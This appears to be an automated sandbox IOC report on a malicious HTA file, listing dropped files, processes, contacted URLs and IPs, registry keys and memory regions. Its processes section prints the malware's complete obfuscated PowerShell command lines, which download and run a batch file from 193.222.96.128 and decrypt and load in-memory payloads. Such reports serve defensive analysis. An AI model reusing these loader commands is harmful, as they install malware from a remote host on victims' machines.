IOC Report
hta.hta

loading gif

Files

File Path
Type
Category
Malicious
hta.hta
HTML document, ASCII text, with very long lines (12111), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\15.bat
DOS batch file, ASCII text, with very long lines (51246), with CRLF line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x52a299a9, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vpghq5i.h0z.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g0nxty.brj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmmc2jq0.cdp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hzzpoyur.gnr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnt5imaf.v2k.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlopwg4f.35s.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Note.txt
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\ConDrv
ASCII text, with very long lines (2141), with CRLF line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\hta.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\15.bat" "
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\15.bat"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Note.txt
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://193.222.96.128:7287/
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://193.222.96.128:7287/15.ba
unknown
http://193.222.
unknown
http://193.222.96.128:728
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://193.222.96.
unknown
http://193.222.96.128:7
unknown
http://193.222.96.128:7287/15
unknown
https://github.com/Pester/Pester
unknown
http://193.222.96.128:72
unknown
http://193.222.96.128:7287
unknown
http://193.222.96.128:7287/Note.txt
193.222.96.128
http://193.222.9
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
http://193.22
unknown
http://193.222.96
unknown
http://crl.micro
unknown
http://193.222.96.1
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://193.222.96.128:
unknown
http://193.222.96.128:7287/15.
unknown
http://193.2
unknown
http://193.222.96.128:7287/15.b
unknown
http://193.222
unknown
http://193.222.96.128:7287/15.bat
193.222.96.128
http://193.222.96.128:7287/1
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://193.222.96.12
unknown
http://193.222.96.128
unknown
There are 27 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
193.222.96.128
unknown
Germany
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\NOTEPAD.EXE.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWindowsOnlyEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fPasteOriginalEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fReverse
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWrapAround
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fMatchCase
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 14 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6DD4000
heap
page read and write
351B000
heap
page read and write
29635E40000
heap
page read and write
70F0000
trusted library allocation
page read and write
6C87000
trusted library allocation
page read and write
4D58000
trusted library allocation
page read and write
752000
trusted library allocation
page read and write
2963B560000
trusted library allocation
page read and write
3555000
heap
page read and write
6836000
heap
page read and write
73E0000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
4A00000
trusted library allocation
page read and write
2B40000
heap
page read and write
71E9000
heap
page read and write
755000
trusted library allocation
page execute and read and write
2963B430000
trusted library allocation
page read and write
7205000
heap
page read and write
AC0FCFE000
unkown
page readonly
4148000
trusted library allocation
page read and write
29637200000
heap
page read and write
356A000
heap
page read and write
296372E9000
heap
page read and write
705E000
stack
page read and write
3563000
heap
page read and write
2B90000
heap
page read and write
B174000
trusted library allocation
page read and write
4801000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
AC0F4FB000
stack
page read and write
682B000
heap
page read and write
4616000
trusted library allocation
page read and write
2FDD000
stack
page read and write
4D6A000
trusted library allocation
page read and write
2A80000
heap
page read and write
5E7000
stack
page read and write
2E2F000
unkown
page read and write
AC0EFFE000
unkown
page readonly
680B000
heap
page read and write
7280000
trusted library allocation
page read and write
676D000
stack
page read and write
586000
heap
page read and write
70C0000
trusted library allocation
page read and write
6DE3000
heap
page read and write
4437000
heap
page read and write
4170000
heap
page execute and read and write
29C4000
heap
page read and write
6DDE000
heap
page read and write
29E2000
heap
page read and write
7207000
heap
page read and write
499C000
stack
page read and write
7070000
trusted library allocation
page read and write
6AF8000
heap
page read and write
3490000
heap
page read and write
2AF0000
heap
page read and write
682A000
heap
page read and write
AC0FFFE000
unkown
page readonly
3595000
heap
page read and write
29637285000
heap
page read and write
29636602000
heap
page read and write
630000
heap
page read and write
AC10D7E000
stack
page read and write
29DA000
heap
page read and write
78D000
stack
page read and write
29637254000
heap
page read and write
7B10000
trusted library allocation
page read and write
AC0F97E000
stack
page read and write
682A000
heap
page read and write
5B19000
trusted library allocation
page read and write
34A3000
heap
page read and write
3566000
heap
page read and write
5ED000
stack
page read and write
40FE000
stack
page read and write
29635ECE000
heap
page read and write
29635EC1000
heap
page read and write
67F8000
heap
page read and write
683A000
heap
page read and write
3590000
heap
page read and write
6C4E000
stack
page read and write
683A000
heap
page read and write
6D9A000
heap
page read and write
2ADF000
stack
page read and write
71A5000
heap
page read and write
5189000
trusted library allocation
page read and write
7EBD000
stack
page read and write
6832000
heap
page read and write
35B7000
heap
page read and write
2B79000
trusted library allocation
page read and write
6CCB000
heap
page read and write
4AFC000
trusted library allocation
page read and write
7160000
heap
page read and write
2C5D000
heap
page read and write
3548000
heap
page read and write
29635E8D000
heap
page read and write
6DDE000
heap
page read and write
66CE000
stack
page read and write
72D0000
trusted library allocation
page execute and read and write
6D20000
heap
page read and write
67DE000
heap
page read and write
3425000
heap
page read and write
7EC000
heap
page read and write
71F8000
heap
page read and write
680B000
heap
page read and write
51E6000
trusted library allocation
page read and write
29F1000
heap
page read and write
73C0000
trusted library allocation
page read and write
69CD000
stack
page read and write
29635EB9000
heap
page read and write
4BCB000
trusted library allocation
page read and write
6EE0000
trusted library allocation
page read and write
5CE000
stack
page read and write
6CDC000
heap
page read and write
65CE000
stack
page read and write
350E000
heap
page read and write
7080000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
29635E84000
heap
page read and write
860000
heap
page read and write
2BDE000
stack
page read and write
4EAC000
trusted library allocation
page read and write
3554000
heap
page read and write
5181000
trusted library allocation
page read and write
71CE000
heap
page read and write
2970000
trusted library allocation
page read and write
45F6000
trusted library allocation
page read and write
387A000
heap
page read and write
4BC5000
trusted library allocation
page read and write
34F1000
heap
page read and write
34A7000
heap
page read and write
723000
trusted library allocation
page execute and read and write
296372C2000
heap
page read and write
67DA000
heap
page read and write
355C000
heap
page read and write
267A000
stack
page read and write
29636E30000
trusted library section
page readonly
2FE0000
heap
page read and write
2963671A000
heap
page read and write
2963B400000
trusted library allocation
page read and write
37BE000
stack
page read and write
739000
trusted library allocation
page read and write
AC104FE000
stack
page read and write
29636E20000
trusted library section
page readonly
67F9000
heap
page read and write
29635C20000
heap
page read and write
AC0F9FE000
unkown
page readonly
3570000
heap
page read and write
682A000
heap
page read and write
29637247000
heap
page read and write
2C30000
heap
page read and write
358C000
heap
page read and write
3519000
heap
page read and write
683A000
heap
page read and write
68ED000
stack
page read and write
3568000
heap
page read and write
718B000
heap
page read and write
2A9E000
stack
page read and write
4E9E000
trusted library allocation
page read and write
354E000
heap
page read and write
3590000
heap
page read and write
5F60000
trusted library allocation
page read and write
682F000
heap
page read and write
5620000
heap
page read and write
7450000
trusted library allocation
page read and write
6720000
heap
page execute and read and write
6DC1000
heap
page read and write
35A5000
heap
page read and write
6725000
heap
page execute and read and write
71CA000
heap
page read and write
7100000
trusted library allocation
page read and write
702D000
stack
page read and write
71C7000
heap
page read and write
49E0000
trusted library allocation
page execute and read and write
2997000
heap
page read and write
7BD0000
heap
page read and write
6815000
heap
page read and write
AC0E71B000
stack
page read and write
3877000
heap
page read and write
29ED000
heap
page read and write
7E70000
trusted library allocation
page read and write
838000
heap
page read and write
680B000
heap
page read and write
AC103FE000
unkown
page readonly
6EF000
stack
page read and write
67EE000
stack
page read and write
750000
trusted library allocation
page read and write
2800000
heap
page read and write
29637302000
heap
page read and write
6DDA000
heap
page read and write
691E000
stack
page read and write
5AF1000
trusted library allocation
page read and write
491E000
stack
page read and write
6DC6000
heap
page read and write
49F5000
heap
page execute and read and write
4920000
heap
page readonly
67E2000
heap
page read and write
29F1000
heap
page read and write
760000
heap
page read and write
2B10000
heap
page read and write
6DE6000
heap
page read and write
7F5000
heap
page read and write
6832000
heap
page read and write
686D000
stack
page read and write
301B000
heap
page read and write
2C07000
heap
page read and write
6AD0000
heap
page read and write
296365E0000
trusted library allocation
page read and write
4A5E000
stack
page read and write
6D7D000
stack
page read and write
3586000
heap
page read and write
7B20000
trusted library allocation
page read and write
34C8000
heap
page read and write
68AA000
stack
page read and write
83F000
heap
page read and write
351B000
heap
page read and write
580000
heap
page read and write
698E000
stack
page read and write
536B000
trusted library allocation
page read and write
29635D20000
heap
page read and write
6D5E000
heap
page read and write
73AD000
stack
page read and write
71DB000
heap
page read and write
3563000
heap
page read and write
2963B440000
trusted library allocation
page read and write
36BE000
stack
page read and write
668E000
stack
page read and write
6310000
trusted library allocation
page read and write
296371E0000
trusted library allocation
page read and write
29BA000
heap
page read and write
2963B4E0000
trusted library allocation
page read and write
354A000
heap
page read and write
81DC000
stack
page read and write
7420000
trusted library allocation
page read and write
71D5000
heap
page read and write
6DD8000
heap
page read and write
2963B5A0000
remote allocation
page read and write
79D000
heap
page read and write
6CFE000
stack
page read and write
9A0000
heap
page read and write
353A000
heap
page read and write
7B8D000
stack
page read and write
682F000
heap
page read and write
34F8000
heap
page read and write
6F6E000
stack
page read and write
AC0F8FE000
unkown
page readonly
B2E0000
heap
page read and write
AC107FE000
unkown
page readonly
42F0000
heap
page read and write
29635EB1000
heap
page read and write
35A4000
heap
page read and write
AD02000
trusted library allocation
page read and write
61BC000
stack
page read and write
29B5000
heap
page read and write
2963B540000
trusted library allocation
page read and write
6CA0000
heap
page read and write
29636E10000
trusted library section
page readonly
682B000
heap
page read and write
67EE000
heap
page read and write
AC0EEFE000
stack
page read and write
34C0000
heap
page read and write
2C5D000
heap
page read and write
353A000
heap
page read and write
2940000
heap
page read and write
34D1000
heap
page read and write
6C70000
heap
page execute and read and write
438000
stack
page read and write
3563000
heap
page read and write
34FA000
heap
page read and write
6815000
heap
page read and write
26D0000
heap
page read and write
709F000
stack
page read and write
6EB0000
trusted library allocation
page read and write
6835000
heap
page read and write
AC0EDFE000
unkown
page readonly
74A000
trusted library allocation
page execute and read and write
732E000
stack
page read and write
7090000
trusted library allocation
page read and write
6AEC000
heap
page read and write
680B000
heap
page read and write
67E8000
heap
page read and write
AC0F6FB000
stack
page read and write
73D0000
trusted library allocation
page read and write
6F0000
heap
page read and write
6DDA000
heap
page read and write
6C80000
trusted library allocation
page read and write
29635EE2000
heap
page read and write
6C90000
heap
page read and write
4181000
trusted library allocation
page read and write
2963730C000
heap
page read and write
5F9E000
stack
page read and write
356D000
heap
page read and write
4140000
trusted library allocation
page read and write
2C43000
heap
page read and write
9EE000
unkown
page read and write
6D99000
heap
page read and write
340E000
stack
page read and write
AC106FB000
stack
page read and write
296372C8000
heap
page read and write
2990000
heap
page read and write
4A9E000
stack
page read and write
29E9000
heap
page read and write
6DD4000
heap
page read and write
29635E5B000
heap
page read and write
AC0F3FE000
unkown
page readonly
7C62000
trusted library allocation
page read and write
5D2E000
stack
page read and write
4300000
heap
page read and write
AC0FEFD000
stack
page read and write
6DDA000
heap
page read and write
67F8000
heap
page read and write
3420000
heap
page read and write
355C000
heap
page read and write
29BE000
heap
page read and write
2963B430000
trusted library allocation
page read and write
4880000
heap
page read and write
AC105FE000
unkown
page readonly
413E000
stack
page read and write
6DE3000
heap
page read and write
2963B400000
trusted library allocation
page read and write
2BC6000
heap
page read and write
682A000
heap
page read and write
71C1000
heap
page read and write
4EF4000
trusted library allocation
page read and write
4872000
trusted library allocation
page read and write
6FCE000
stack
page read and write
70D0000
trusted library allocation
page read and write
2C3B000
heap
page read and write
2963B550000
trusted library allocation
page read and write
2B63000
trusted library allocation
page execute and read and write
29637265000
heap
page read and write
3568000
heap
page read and write
2F2A000
stack
page read and write
296372D4000
heap
page read and write
3565000
heap
page read and write
5EDE000
stack
page read and write
7F3E000
stack
page read and write
296372FE000
heap
page read and write
4740000
heap
page read and write
3577000
heap
page read and write
29636E40000
trusted library section
page readonly
AC0FDFE000
unkown
page readonly
296372C0000
heap
page read and write
4BF5000
trusted library allocation
page read and write
67E7000
heap
page read and write
72D000
trusted library allocation
page execute and read and write
AC0FD7E000
stack
page read and write
3571000
heap
page read and write
29F9000
heap
page read and write
3588000
heap
page read and write
682A000
heap
page read and write
48DE000
stack
page read and write
350A000
heap
page read and write
2A60000
heap
page read and write
769000
heap
page read and write
6A0000
heap
page read and write
6DEA000
heap
page read and write
4090000
heap
page readonly
980000
heap
page read and write
5F5F000
stack
page read and write
6D14000
heap
page read and write
29636600000
heap
page read and write
6BAE000
stack
page read and write
6DE3000
heap
page read and write
3450000
trusted library allocation
page read and write
5AF9000
trusted library allocation
page read and write
29C4000
heap
page read and write
350A000
heap
page read and write
2B70000
trusted library allocation
page read and write
3590000
heap
page read and write
7BCE000
stack
page read and write
2B9E000
unkown
page read and write
73F0000
trusted library allocation
page read and write
6DA2000
heap
page read and write
4ADE000
stack
page read and write
6A1F000
stack
page read and write
35B7000
heap
page read and write
570000
heap
page read and write
3590000
heap
page read and write
7F9000
heap
page read and write
34F1000
heap
page read and write
70B0000
trusted library allocation
page read and write
3568000
heap
page read and write
5AB000
stack
page read and write
3500000
heap
page read and write
6D9A000
heap
page read and write
29635DE1000
trusted library allocation
page read and write
29635D60000
trusted library section
page read and write
34FE000
heap
page read and write
700E000
stack
page read and write
4080000
trusted library allocation
page read and write
680B000
heap
page read and write
7C40000
trusted library allocation
page read and write
2B1B000
heap
page read and write
2F90000
heap
page read and write
29637400000
trusted library allocation
page read and write
2B85000
heap
page read and write
29635EEF000
heap
page read and write
351A000
heap
page read and write
4585000
trusted library allocation
page read and write
AC0F0FC000
stack
page read and write
4B36000
trusted library allocation
page read and write
29637305000
heap
page read and write
29636E00000
trusted library section
page readonly
67F8000
heap
page read and write
682F000
heap
page read and write
78F000
heap
page read and write
4304000
heap
page read and write
35B7000
heap
page read and write
6832000
heap
page read and write
29635EC5000
heap
page read and write
3510000
heap
page read and write
67E9000
heap
page read and write
34FD000
heap
page read and write
4BD3000
trusted library allocation
page read and write
7EFE000
stack
page read and write
AC102FE000
unkown
page readonly
6DDE000
heap
page read and write
357C000
heap
page read and write
29BE000
heap
page read and write
49DD000
stack
page read and write
5E7E000
stack
page read and write
70DE000
stack
page read and write
6B2E000
stack
page read and write
4B22000
trusted library allocation
page read and write
67F8000
heap
page read and write
7430000
trusted library allocation
page read and write
6835000
heap
page read and write
5360000
heap
page read and write
358E000
heap
page read and write
34F1000
heap
page read and write
67F8000
heap
page read and write
67D0000
heap
page read and write
3586000
heap
page read and write
2B80000
heap
page read and write
2963B530000
trusted library allocation
page read and write
AC0F2F9000
stack
page read and write
6C3D000
stack
page read and write
9A9000
heap
page read and write
72E0000
heap
page read and write
B170000
trusted library allocation
page read and write
2963B473000
trusted library allocation
page read and write
730000
trusted library allocation
page read and write
2B50000
trusted library allocation
page read and write
3460000
trusted library allocation
page read and write
2963B5A0000
remote allocation
page read and write
5366000
heap
page read and write
29635E9D000
heap
page read and write
67ED000
heap
page read and write
6FFC000
stack
page read and write
683A000
heap
page read and write
3554000
heap
page read and write
41DE000
trusted library allocation
page read and write
29636B40000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
2B6D000
trusted library allocation
page execute and read and write
6815000
heap
page read and write
6D80000
heap
page read and write
720000
trusted library allocation
page read and write
29BB000
heap
page read and write
55C0000
heap
page read and write
29635E00000
heap
page read and write
67F8000
heap
page read and write
4420000
heap
page read and write
AC0ECF7000
stack
page read and write
68E000
stack
page read and write
72CE000
stack
page read and write
60F000
stack
page read and write
3519000
heap
page read and write
353A000
heap
page read and write
2A50000
heap
page read and write
682D000
heap
page read and write
490000
heap
page read and write
354C000
heap
page read and write
7C50000
trusted library allocation
page read and write
AC0FC7E000
stack
page read and write
6A8E000
stack
page read and write
2963B5A0000
remote allocation
page read and write
4BCE000
trusted library allocation
page read and write
29635E13000
heap
page read and write
6F1B000
stack
page read and write
2C5D000
heap
page read and write
683A000
heap
page read and write
7400000
trusted library allocation
page read and write
354C000
heap
page read and write
AC0F1FE000
unkown
page readonly
27F0000
heap
page read and write
6835000
heap
page read and write
6DA0000
heap
page read and write
6CBE000
stack
page read and write
29635F13000
heap
page read and write
67FB000
heap
page read and write
7C80000
trusted library allocation
page read and write
7F7E000
stack
page read and write
2C5D000
heap
page read and write
AC0F87E000
stack
page read and write
682F000
heap
page read and write
2B64000
trusted library allocation
page read and write
2963B4D0000
trusted library allocation
page read and write
7BE0000
heap
page read and write
40A0000
trusted library allocation
page execute and read and write
5624000
heap
page read and write
68D000
stack
page read and write
683A000
heap
page read and write
682B000
heap
page read and write
3563000
heap
page read and write
67ED000
heap
page read and write
6D10000
heap
page read and write
49F0000
heap
page execute and read and write
3515000
heap
page read and write
6ED9000
trusted library allocation
page read and write
6B6E000
stack
page read and write
7B00000
trusted library allocation
page execute and read and write
34F0000
heap
page read and write
2C44000
heap
page read and write
35B7000
heap
page read and write
4DD0000
trusted library allocation
page read and write
97E000
unkown
page read and write
6ACE000
stack
page read and write
3574000
heap
page read and write
43EF000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
6815000
heap
page read and write
29635E2B000
heap
page read and write
AC0F7FE000
unkown
page readonly
7060000
trusted library allocation
page read and write
353A000
heap
page read and write
34DE000
heap
page read and write
29635F29000
heap
page read and write
2963B444000
trusted library allocation
page read and write
357B000
heap
page read and write
6EDE000
stack
page read and write
3594000
heap
page read and write
2963671A000
heap
page read and write
6DE3000
heap
page read and write
4280000
heap
page read and write
34A0000
heap
page read and write
67ED000
heap
page read and write
6DDE000
heap
page read and write
2FB0000
heap
page read and write
5FDF000
stack
page read and write
6832000
heap
page read and write
3501000
heap
page read and write
67D4000
heap
page read and write
4870000
trusted library allocation
page read and write
35B7000
heap
page read and write
682F000
stack
page read and write
294B000
heap
page read and write
3574000
heap
page read and write
660E000
stack
page read and write
88A0000
heap
page read and write
692B000
stack
page read and write
683A000
heap
page read and write
296365D0000
trusted library allocation
page read and write
29636E50000
trusted library section
page readonly
354A000
heap
page read and write
2638000
stack
page read and write
7110000
trusted library allocation
page read and write
2963B401000
trusted library allocation
page read and write
67EE000
heap
page read and write
67ED000
heap
page read and write
67D1000
heap
page read and write
7270000
trusted library allocation
page read and write
42CD000
stack
page read and write
35B7000
heap
page read and write
7470000
trusted library allocation
page read and write
1DC000
stack
page read and write
3510000
heap
page read and write
658E000
stack
page read and write
29635EA1000
heap
page read and write
4877000
trusted library allocation
page execute and read and write
29636615000
heap
page read and write
7410000
trusted library allocation
page read and write
2FA0000
heap
page read and write
2C5D000
heap
page read and write
296372DC000
heap
page read and write
2963B4D0000
trusted library allocation
page read and write
350A000
heap
page read and write
73B0000
